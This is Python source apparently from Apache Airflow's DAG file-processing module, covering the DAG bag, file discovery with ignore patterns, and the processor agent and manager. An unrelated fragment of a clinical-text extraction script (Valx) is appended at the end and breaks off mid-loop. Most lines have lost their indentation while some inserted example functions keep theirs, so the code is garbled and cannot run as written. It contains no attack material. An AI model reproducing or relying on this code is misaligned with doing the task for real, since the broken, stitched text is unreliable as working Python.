def queue(self):
return self._queue
@property
def key(self):
return self._key
@property
def executor_config(self):
return self._executor_config
@provide_session
def construct_task_instance(self, session=None, lock_for_update=False):
"""
Construct a TaskInstance from the database based on the primary key
:param session: DB session.
:param lock_for_update: if True, indicates that the database should
lock the TaskInstance (issuing a FOR UPDATE clause) until the
session is committed.
"""
TI = airflow.models.TaskInstance
qry = session.query(TI).filter(
TI.dag_id == self._dag_id,
TI.task_id == self._task_id,
TI.execution_date == self._execution_date)
if lock_for_update:
ti = qry.with_for_update().first()
else:
ti = qry.first()
return ti
class SimpleDagBag(BaseDagBag):
"""
A collection of SimpleDag objects with some convenience methods.
"""
def __init__(self, simple_dags):
"""
Constructor.
:param simple_dags: SimpleDag objects that should be in this bag
:type simple_dags: list[airflow.utils.dag_processing.SimpleDag]
"""
self.simple_dags = simple_dags
self.dag_id_to_simple_dag = {}
for simple_dag in simple_dags:
self.dag_id_to_simple_dag[simple_dag.dag_id] = simple_dag
@property
def dag_ids(self):
"""
:return: IDs of all the DAGs in this bag
:rtype: list[unicode]
"""
return self.dag_id_to_simple_dag.keys()
def get_dag(self, dag_id):
"""
:param dag_id: DAG ID
:type dag_id: unicode
:return: if the given DAG ID exists in the bag, return the BaseDag
corresponding to that ID. Otherwise, throw an Exception
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if dag_id not in self.dag_id_to_simple_dag:
raise AirflowException("Unknown DAG ID {}".format(dag_id))
return self.dag_id_to_simple_dag[dag_id]
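# A small sketch of SimpleDagBag lookups (assumed usage, not part of the module):
# any object exposing a ``dag_id`` attribute can stand in for a SimpleDag here.
def _example_simple_dag_bag_lookup():
    from types import SimpleNamespace

    bag = SimpleDagBag([SimpleNamespace(dag_id='example_dag')])
    assert 'example_dag' in bag.dag_ids
    assert bag.get_dag('example_dag').dag_id == 'example_dag'
    try:
        bag.get_dag('missing_dag')
    except AirflowException:
        pass  # unknown DAG IDs raise AirflowException, as documented above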
def correct_maybe_zipped(fileloc):
"""
If the path contains a folder with a .zip suffix, the folder is treated as a
zip archive and the path to the zip archive is returned; otherwise the path
is returned unchanged.
"""
_, archive, filename = re.search(
r'((.*\.zip){})?(.*)'.format(re.escape(os.sep)), fileloc).groups()
if archive and zipfile.is_zipfile(archive):
return archive
else:
return fileloc
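# A self-contained sketch of correct_maybe_zipped() (illustrative only): build a
# real zip archive in a temporary directory so the zipfile.is_zipfile() check
# passes, then compare the zipped and plain cases.
def _example_correct_maybe_zipped():
    import tempfile

    with tempfile.TemporaryDirectory() as tmp:
        archive = os.path.join(tmp, 'dags.zip')
        with zipfile.ZipFile(archive, 'w') as zf:
            zf.writestr('my_dag.py', 'DAG = None  # placeholder\n')
        # A path *inside* the archive resolves to the archive itself...
        assert correct_maybe_zipped(os.path.join(archive, 'my_dag.py')) == archive
        # ...while a plain file path is returned unchanged.
        plain = os.path.join(tmp, 'my_dag.py')
        assert correct_maybe_zipped(plain) == plain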
COMMENT_PATTERN = re.compile(r"\s*#.*")
def list_py_file_paths(directory, safe_mode=conf.getboolean('core', 'DAG_DISCOVERY_SAFE_MODE', fallback=True),
include_examples=None):
"""
Traverse a directory and look for Python files.
:param directory: the directory to traverse
:type directory: unicode
:param safe_mode: whether to use a heuristic to determine whether a file
contains Airflow DAG definitions. If not provided, use the
core.DAG_DISCOVERY_SAFE_MODE configuration setting. If not set, default
to safe.
:param include_examples: whether to include the example DAGs shipped with
Airflow; if None, fall back to the core.LOAD_EXAMPLES setting.
:return: a list of paths to Python files in the specified directory
:rtype: list[unicode]
"""
if include_examples is None:
include_examples = conf.getboolean('core', 'LOAD_EXAMPLES')
file_paths = []
if directory is None:
return []
elif os.path.isfile(directory):
return [directory]
elif os.path.isdir(directory):
patterns_by_dir = {}
for root, dirs, files in os.walk(directory, followlinks=True):
patterns = patterns_by_dir.get(root, [])
ignore_file = os.path.join(root, '.airflowignore')
if os.path.isfile(ignore_file):
with open(ignore_file, 'r') as f:
# If we have new patterns create a copy so we don't change
# the previous list (which would affect other subdirs)
lines_no_comments = [COMMENT_PATTERN.sub("", line) for line in f.read().split("\n")]
patterns += [re.compile(line) for line in lines_no_comments if line]
# If we can ignore any subdirs entirely we should - fewer paths
# to walk is better. We have to modify the ``dirs`` array in
# place for this to affect os.walk
dirs[:] = [
d
for d in dirs
if not any(p.search(os.path.join(root, d)) for p in patterns)
]
# We want patterns defined in a parent folder's .airflowignore to
# apply to subdirs too
for d in dirs:
patterns_by_dir[os.path.join(root, d)] = patterns
for f in files:
try:
file_path = os.path.join(root, f)
if not os.path.isfile(file_path):
continue
mod_name, file_ext = os.path.splitext(
os.path.split(file_path)[-1])
if file_ext != '.py' and not zipfile.is_zipfile(file_path):
continue
if any([re.findall(p, file_path) for p in patterns]):
continue
# Heuristic that guesses whether a Python file contains an
# Airflow DAG definition.
might_contain_dag = True
if safe_mode and not zipfile.is_zipfile(file_path):
with open(file_path, 'rb') as fp:
content = fp.read()
might_contain_dag = all(
[s in content for s in (b'DAG', b'airflow')])
if not might_contain_dag:
continue
file_paths.append(file_path)
except Exception:
log = LoggingMixin().log
log.exception("Error while examining %s", f)
if include_examples:
import airflow.example_dags
example_dag_folder = airflow.example_dags.__path__[0]
file_paths.extend(list_py_file_paths(example_dag_folder, safe_mode, False))
return file_paths
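# A sketch of the safe-mode heuristic used above (hypothetical file contents):
# a file is only reported as a DAG candidate when both b'DAG' and b'airflow'
# appear somewhere in its bytes.
def _example_safe_mode_heuristic():
    import tempfile

    with tempfile.TemporaryDirectory() as tmp:
        dag_like = os.path.join(tmp, 'real_dag.py')
        with open(dag_like, 'wb') as f:
            f.write(b'from airflow import DAG\n')
        with open(os.path.join(tmp, 'helper.py'), 'wb') as f:
            f.write(b'print("no dags here")\n')
        found = list_py_file_paths(tmp, safe_mode=True, include_examples=False)
        # Only the file mentioning both "DAG" and "airflow" survives the heuristic.
        assert found == [dag_like]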
class AbstractDagFileProcessor(object):
"""
Processes a DAG file. See SchedulerJob.process_file() for more details.
"""
__metaclass__ = ABCMeta
@abstractmethod
def start(self):
"""
Launch the process to process the file
"""
raise NotImplementedError()
@abstractmethod
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file
"""
raise NotImplementedError()
@property
@abstractmethod
def pid(self):
"""
:return: the PID of the process launched to process the given file
"""
raise NotImplementedError()
@property
@abstractmethod
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
raise NotImplementedError()
@property
@abstractmethod
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
raise NotImplementedError()
@property
@abstractmethod
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
raise NotImplementedError()
@property
@abstractmethod
def start_time(self):
"""
:return: When this started to process the file
:rtype: datetime
"""
raise NotImplementedError()
@property
@abstractmethod
def file_path(self):
"""
:return: the path to the file that this is processing
:rtype: unicode
"""
raise NotImplementedError()
DagParsingStat = namedtuple('DagParsingStat', ['file_paths', 'done', 'all_files_processed'])
class DagParsingSignal(enum.Enum):
AGENT_HEARTBEAT = 'agent_heartbeat'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
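# A minimal sketch (assumed usage) of how these signals travel between the agent
# and the manager: both ends of a multiprocessing.Pipe exchange DagParsingSignal
# members and DagParsingStat tuples.
def _example_signal_round_trip():
    parent_conn, child_conn = multiprocessing.Pipe()
    parent_conn.send(DagParsingSignal.AGENT_HEARTBEAT)
    assert child_conn.recv() == DagParsingSignal.AGENT_HEARTBEAT
    child_conn.send(DagParsingStat(file_paths=[], done=False, all_files_processed=False))
    assert parent_conn.recv().done is False
    parent_conn.close()
    child_conn.close()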
class DagFileProcessorAgent(LoggingMixin):
"""
Agent for DAG file processing. It is responsible for all DAG-parsing-related
jobs in the scheduler process: it spins up a DagFileProcessorManager in a
subprocess, collects DAG parsing results from it, and exchanges signals and
DAG parsing stats with it.
This class runs in the main `airflow scheduler` process.
"""
def __init__(self,
dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
async_mode):
"""
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param file_paths: list of file paths that contain DAG definitions
:type file_paths: list[unicode]
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path, log_file_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessor)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param async_mode: Whether to start agent in async mode
:type async_mode: bool
"""
self._file_paths = file_paths
self._file_path_queue = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._processor_timeout = processor_timeout
self._async_mode = async_mode
# Map from file path to the processor
self._processors = {}
# Map from file path to the last runtime
self._last_runtime = {}
# Map from file path to the last finish time
self._last_finish_time = {}
# Map from file path to the number of runs
self._run_count = defaultdict(int)
# Pipe for communicating signals
self._process = None
self._done = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn = None
self._collected_dag_buffer = []
def start(self):
"""
Launch DagFileProcessorManager processor and start DAG parsing loop in manager.
"""
self._parent_signal_conn, child_signal_conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._file_paths,
self._max_runs,
self._processor_factory,
self._processor_timeout,
child_signal_conn,
self._async_mode,
)
)
self._process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", self._process.pid)
def heartbeat(self):
"""
Should only be used when the DAG file processor manager was launched in sync mode.
Sends an agent heartbeat signal to the manager, requesting that it run one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing.
"""
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_HEARTBEAT)
except ConnectionError:
# If the manager died because of an error, it will be noticed and restarted
# when harvest_simple_dags calls _heartbeat_manager.
pass
def wait_until_finished(self):
while self._parent_signal_conn.poll():
try:
result = self._parent_signal_conn.recv()
except EOFError:
break
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode we don't send this message from the Manager
# until all the running processors have finished
return
@staticmethod
def _run_processor_manager(dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode):
# Make this process start as a new process group - that makes it easy
# to kill all sub-processes of this one at the OS level, rather than having
# to iterate over the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collisions with the parent
# process. This process may need custom configurations that cannot be
# shared, e.g. a RotatingFileHandler, and connections can become corrupted
# if we do not recreate the SQLAlchemy connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__CORE__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
reload_module(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0]))
reload_module(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode)
processor_manager.start()
def harvest_simple_dags(self):
"""
Harvest DAG parsing results from result queue and sync metadata from stat queue.
:return: List of parsing results in SimpleDag format.
"""
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll():
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
simple_dags = self._collected_dag_buffer
self._collected_dag_buffer = []
# If it died unexpectedly, restart the manager process
self._heartbeat_manager()
return simple_dags
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
self._collected_dag_buffer.append(message)
def _heartbeat_manager(self):
"""
Heartbeat DAG file processor and restart it if we are not done.
"""
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid, self._process.exitcode
)
self.start()
def _sync_metadata(self, stat):
"""
Sync metadata from stat queue and only keep the latest stat.
"""
self._file_paths = stat.file_paths
self._done = stat.done
self._all_files_processed = stat.all_files_processed
@property
def file_paths(self):
return self._file_paths
@property
def done(self):
return self._done
@property
def all_files_processed(self):
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
def end(self):
"""
Terminate (and then kill) the launched manager process.
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
reap_process_group(self._process.pid, log=self.log)
self._parent_signal_conn.close()
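# Rough lifecycle sketch for the agent above (hypothetical arguments; a real
# processor_factory comes from the scheduler job, so this is an outline rather
# than runnable code):
#
#   agent = DagFileProcessorAgent(dag_directory, file_paths, max_runs,
#                                 processor_factory, processor_timeout,
#                                 async_mode=False)
#   agent.start()                      # fork the DagFileProcessorManager
#   agent.heartbeat()                  # sync mode: request one parsing "loop"
#   agent.wait_until_finished()        # block until that loop's processors finish
#   simple_dags = agent.harvest_simple_dags()
#   agent.terminate()                  # ask the manager to shut down
#   agent.end()                        # reap the manager's process group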
class DagFileProcessorManager(LoggingMixin):
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and puts the results onto a multiprocessing queue
for DagFileProcessorAgent to harvest. The parallelism is limited, and as
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:type _file_path_queue: list[unicode]
:type _processors: dict[unicode, AbstractDagFileProcessor]
:type _last_runtime: dict[unicode, float]
:type _last_finish_time: dict[unicode, datetime.datetime]
"""
def __init__(self,
dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode=True):
"""
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param file_paths: list of file paths that contain DAG definitions
:type file_paths: list[unicode]
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessor)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param signal_conn: connection used to exchange signals with the processor agent.
:type signal_conn: multiprocessing.connection.Connection
:param async_mode: whether to start the manager in async mode
:type async_mode: bool
"""
self._file_paths = file_paths
self._file_path_queue = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._signal_conn = signal_conn
self._async_mode = async_mode
self._parallelism = conf.getint('scheduler', 'max_threads')
if 'sqlite' in conf.get('core', 'sql_alchemy_conn') and self._parallelism > 1:
self.log.error("Cannot use more than 1 thread when using sqlite. "
"Setting parallelism to 1")
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler',
'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler',
'print_stats_interval')
# Map from file path to the processor
self._processors = {}
# Map from file path to the last runtime
self._last_runtime = {}
# Map from file path to the last finish time
self._last_finish_time = {}
self._last_zombie_query_time = timezone.utcnow()
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.utcnow()
# Last time stats were printed
self.last_stat_print_time = timezone.datetime(2000, 1, 1)
# TODO: Remove magic number
self._zombie_query_interval = 10
# Map from file path to the number of runs
self._run_count = defaultdict(int)
# Manager heartbeat key.
self._heart_beat_key = 'heart-beat'
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler',
'dag_dir_list_interval')
self._log = logging.getLogger('airflow.processor_manager')
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up DAG file processors to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
# In sync mode we want timeout=None -- wait forever until a message is received
poll_time = None # type: Optional[float]
if self._async_mode:
poll_time = 0.0
self.log.debug("Starting DagFileProcessorManager in async mode")
else:
poll_time = None
self.log.debug("Starting DagFileProcessorManager in sync mode")
while True:
loop_start_time = time.time()
if self._signal_conn.poll(poll_time):
agent_signal = self._signal_conn.recv()
self.log.debug("Recived %s singal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_HEARTBEAT:
# continue the loop to parse dags
pass
elif not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
                # SQLite DB which isn't a good practice)
continue
self._refresh_dag_dir()
simple_dags = self.heartbeat()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
if not self._async_mode:
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
simple_dags = self.collect_results()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None
for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
dag_parsing_stat = DagParsingStat(self._file_paths,
max_runs_reached,
all_files_processed,
)
self._signal_conn.send(dag_parsing_stat)
if max_runs_reached:
self.log.info("Exiting dag parsing loop as all files "
"have been processed %s times", self._max_runs)
break
if self._async_mode:
loop_duration = time.time() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
def _refresh_dag_dir(self):
"""
Refresh file paths from dag dir if we haven't done it for too long.
"""
elapsed_time_since_refresh = (timezone.utcnow() -
self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = timezone.utcnow()
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors()
except Exception:
self.log.exception("Error removing old import errors")
def _print_stat(self):
"""
Occasionally print out stats about how fast the files are getting processed
"""
if ((timezone.utcnow() - self.last_stat_print_time).total_seconds() >
self.print_stats_interval):
if len(self._file_paths) > 0:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = timezone.utcnow()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(
~errors.ImportError.filename.in_(self._file_paths)
)
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path",
"PID",
"Runtime",
"Last Runtime",
"Last Run"]
rows = []
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
if last_runtime:
Stats.gauge(
'dag_processing.last_runtime.{}'.format(file_name),
last_runtime
)
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = ((timezone.utcnow() - processor_start_time).total_seconds()
if processor_start_time else None)
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (timezone.utcnow() - last_run).total_seconds()
Stats.gauge(
'dag_processing.last_run.seconds_ago.{}'.format(file_name),
seconds_ago
)
rows.append((file_path,
processor_pid,
runtime,
last_runtime,
last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[3] or 0.0)
formatted_rows = []
for file_path, pid, runtime, last_runtime, last_run in rows:
formatted_rows.append((file_path,
pid,
"{:.2f}s".format(runtime)
if runtime else None,
"{:.2f}s".format(last_runtime)
if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S")
if last_run else None))
log_str = ("\n" +
"=" * 80 +
"\n" +
"DAG File Processing Stats\n\n" +
tabulate(formatted_rows, headers=headers) +
"\n" +
"=" * 80)
self.log.info(log_str)
@property
def file_paths(self):
return self._file_paths
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_runtime(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the current runtime (in seconds) of the process that's
processing the specified file or None if the file is not currently
being processed
"""
if file_path in self._processors:
return (timezone.utcnow() - self._processors[file_path].start_time)\
.total_seconds()
return None
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
return self._last_runtime.get(file_path)
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
return self._last_finish_time.get(file_path)
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue
if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
processor.terminate()
self._processors = filtered_processors
def wait_until_finished(self):
"""
Sleeps until all the processors are done.
"""
for file_path, processor in self._processors.items():
while not processor.done:
time.sleep(0.1)
def collect_results(self):
"""
Collect the result from any finished DAG processors
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
self._kill_timed_out_processors()
finished_processors = {}
""":type : dict[unicode, AbstractDagFileProcessor]"""
running_processors = {}
""":type : dict[unicode, AbstractDagFileProcessor]"""
for file_path, processor in self._processors.items():
if processor.done:
self.log.debug("Processor for %s finished", file_path)
now = timezone.utcnow()
finished_processors[file_path] = processor
self._last_runtime[file_path] = (now -
processor.start_time).total_seconds()
self._last_finish_time[file_path] = now
self._run_count[file_path] += 1
else:
running_processors[file_path] = processor
self._processors = running_processors
self.log.debug("%s/%s DAG parsing processes running",
len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing",
len(self._file_path_queue))
# Collect all the DAGs that were found in the processed files
simple_dags = []
for file_path, processor in finished_processors.items():
if processor.result is None:
self.log.warning(
"Processor for %s exited with return code %s.",
processor.file_path, processor.exit_code
)
else:
for simple_dag in processor.result:
simple_dags.append(simple_dag)
return simple_dags
def heartbeat(self):
"""
This should be periodically called by the manager loop. This method will
kick off new processes to process DAG definition files and read the
results from the finished processors.
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
simple_dags = self.collect_results()
# Generate more file paths to process if we processed all the files
# already.
if len(self._file_path_queue) == 0:
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
file_paths_recently_processed = []
for file_path in self._file_paths:
last_finish_time = self.get_last_finish_time(file_path)
if (last_finish_time is not None and
(now - last_finish_time).total_seconds() <
self._file_process_interval):
file_paths_recently_processed.append(file_path)
files_paths_at_run_limit = [file_path
for file_path, num_runs in self._run_count.items()
if num_runs == self._max_runs]
files_paths_to_queue = list(set(self._file_paths) -
set(file_paths_in_progress) -
set(file_paths_recently_processed) -
set(files_paths_at_run_limit))
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path, processor.start_time.isoformat()
)
self.log.debug(
"Queuing the following files for processing:\n\t%s",
"\n\t".join(files_paths_to_queue)
)
self._file_path_queue.extend(files_paths_to_queue)
# Start more processors if we have enough slots and files to process
while (self._parallelism - len(self._processors) > 0 and
len(self._file_path_queue) > 0):
file_path = self._file_path_queue.pop(0)
processor = self._processor_factory(file_path)
processor.start()
self.log.debug(
"Started a process (PID: %s) to generate tasks for %s",
processor.pid, file_path
)
self._processors[file_path] = processor
# Update heartbeat count.
self._run_count[self._heart_beat_key] += 1
return simple_dags
def _kill_timed_out_processors(self):
"""
        Kill any file processors that have timed out, to defend against process hangs.
"""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.info(
"Processor for %s with PID %s started at %s has timed out, "
"killing it.",
processor.file_path, processor.pid, processor.start_time.isoformat())
Stats.incr('dag_file_processor_timeouts', 1, 1)
processor.kill()
def max_runs_reached(self):
"""
:return: whether all file paths have been processed max_runs times
"""
if self._max_runs == -1: # Unlimited runs.
return False
for file_path in self._file_paths:
if self._run_count[file_path] < self._max_runs:
return False
if self._run_count[self._heart_beat_key] < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
        them orphaned.
"""
pids_to_kill = self.get_all_pids()
if len(pids_to_kill) > 0:
# First try SIGTERM
this_process = psutil.Process(os.getpid())
# Only check child processes to ensure that we don't have a case
# where we kill the wrong process because a child process died
# but the PID got reused.
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
for child in child_processes:
self.log.info("Terminating child PID: %s", child.pid)
child.terminate()
# TODO: Remove magic number
timeout = 5
self.log.info("Waiting up to %s seconds for processes to exit...", timeout)
try:
psutil.wait_procs(
child_processes, timeout=timeout,
callback=lambda x: self.log.info('Terminated PID %s', x.pid))
except psutil.TimeoutExpired:
self.log.debug("Ran out of time while waiting for processes to exit")
# Then SIGKILL
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
if len(child_processes) > 0:
self.log.info("SIGKILL processes that did not terminate gracefully")
for child in child_processes:
self.log.info("Killing child PID: %s", child.pid)
child.kill()
child.wait()
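# Illustrative wiring sketch (not part of the original module). Per the
# constructor docstring above, `processor_factory` takes a DAG definition file
# path and returns an AbstractDagFileProcessor, and `signal_conn` is the pipe
# end used for signal/stat traffic with the DagFileProcessorAgent. The
# `processor_cls` argument below is a hypothetical processor class supplied by
# the caller; it is not defined in this file.
def _example_manager_wiring(dag_directory, file_paths, processor_cls):
    import multiprocessing
    from datetime import timedelta
    parent_conn, child_conn = multiprocessing.Pipe()
    def processor_factory(file_path):
        # Create one processor per DAG definition file path.
        return processor_cls(file_path)
    manager = DagFileProcessorManager(
        dag_directory=dag_directory,
        file_paths=file_paths,
        max_runs=-1,                             # keep re-parsing indefinitely
        processor_factory=processor_factory,
        processor_timeout=timedelta(minutes=5),
        signal_conn=child_conn,
        async_mode=True)
    manager.start()                              # enters the parsing loop above
    return parent_conn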
|
Valx_CTgov_multiCPUcores.py
|
# Valx: A system for extracting and structuring numeric lab test comparison statements from text
# Created by Tony HAO, th2510@columbia.edu
# Please kindly cite the paper: Tianyong Hao, Hongfang Liu, Chunhua Weng. Valx: A system for extracting and structuring numeric lab test comparison statements from text. Methods of Information in Medicine. Vol. 55: Issue 3, pp. 266-275, 2016
import W_utility.file as ufile
from W_utility.log import ext_print
import os,sys,re
import Valx_core
from multiprocessing import Process, Manager
#thread worker function
def worker(trials, start,end, var, features, feature_dict_dk, fea_dict_umls, output):
#load numeric feature list
Valx_core.init_features()
for i in range(start,end+1):
if i%200 == 0: #define output frequency
print ('processing %d' % i)
# pre-processing text,
text = Valx_core.preprocessing(trials[i][1]) # trials[i][1] is eligibility criteria text
(sections_num, candidates_num) = Valx_core.extract_candidates_numeric(text) # extract candidates containing numeric features
for j in range(len(candidates_num)): # for each candidate
exp_text = Valx_core.formalize_expressions(candidates_num[j]) # identify and formalize values
